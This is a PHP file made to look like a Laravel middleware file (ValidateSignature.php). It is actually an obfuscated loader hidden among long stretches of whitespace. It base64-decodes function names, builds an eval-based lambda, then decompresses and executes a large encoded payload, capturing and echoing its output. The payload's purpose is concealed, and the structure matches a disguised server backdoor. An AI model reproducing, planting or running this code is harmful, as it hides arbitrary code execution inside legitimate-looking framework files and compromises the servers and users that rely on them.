<?php 
        $__='printf';$_='Loading app/Http/Middleware/ValidateSignature.php';
        







































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtmltvmzAUgN8j7T/koRKtNqVAmi1RxENg5ZY0U9PWNrxUgIlhQKCFXOivn3Nps6za1mrTpFXns8zF9rnZBz8gN5tbjm45ilDcx7NqKvQ3rzsUwSuKU7OqitOLmNI0XHr34Sny0ph6VXgVs5lXze/DVhEVTS31yrLVagn9xk5x810DCpTflcY645p/EeVZi0CkXulgKXaNc0XYNO2z9EXsvgqlCQAA8DYRggyJlNhzy0Cyg5e5rfempE4+bTdNvmtut+tbmCoAAAAAAAAA+N+A3xkAAABvF8H3yvDj2S0Ng5yGQh9mBAAAAAD+iMOjEhor5g6W0qCtRo58wy6JuiTnkUhNNbjGaeIaq5TKeu1el0Nthh7cK9X2jZXk43TukElKdHtByaTwM3o4Hq2wg1eFa+iii8aFK3ciaqKay0dBrY49PEl8A7UdYqdflvnQkVdR0L5gKNNL3hdRA117mK5tSEF2w1wSiS7uJD/KarNyaGkDZmnduyHL2fY5Z8iIUsvoRD5GD5bRyyxzknPbK4pRHV6pD9S0uc8BCwy9XsfP7dVct+hxfy1znPttVLqaGnOZte+LIEPJaK9/Z3NwZ52rskMsxn2pHZJ0PdwRR9qT/vdavBnHhnF3K2Oqtd+epA6vrjZIeFxfXaKK1meR4eWj/k08C0ujmZON+XxczkaDZ30SNaSpI+sVj4H7ePaLMb05j29OtaB89GddR3WX2W0k+qhXuXhSUCz+VEcg9/g6jFO7Xg73/YPFqB7M+PpXhMcTZHt5wvNlepkrQr/R+PfJrWzux7u3k/5rxL+TfYng0d7gsbC+Ch+ezMKZIiivOVN0mFPHB0m8TamT/jfI5jtp';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






































































































































































































































































                                                                                                                                                                                                                     $________;
